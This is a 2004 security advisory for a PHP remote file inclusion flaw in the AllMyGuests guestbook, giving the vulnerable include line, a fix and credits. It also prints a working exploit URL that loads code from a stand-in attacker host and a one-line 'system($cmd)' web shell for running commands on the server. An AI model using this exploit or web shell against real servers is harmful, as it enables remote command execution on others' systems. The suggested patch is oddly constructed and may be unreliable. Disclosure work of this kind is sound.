AllMyGuests PHP Code Injection vulnerability

2004-02-17T00:00:00
ID SECURITYVULNS:DOC:5774
Type securityvulns
Reporter Securityvulns
Modified 2004-02-17T00:00:00

Description

* AllMyGuests PHP Code Injection vulnerability *

Product : AllMyGuests Vendor : www.php-resource.net Date : February 14, 2004 Problem : PHP Code Injection Vendor Contacted ? : No

**** Source ****

in /include/info.inc.php


$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");


**** Exploit *******

http://[target]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :


<? system($cmd); ?>


**** Impact ****

Malicious user execute arbitrary commands on the server .

**** Solution ******

in /include/info.inc.php replace

$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");

for

if (isset($_AMGconfig[cfg_serverpath])){ die("Don\'t Hack it :)"); }

$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");

**** Credits ****

bnfx : bnfx@antisocial.com

Mad_Skater : m4dsk4t3r@hotmail.com

TechTeam Brazilian Crew .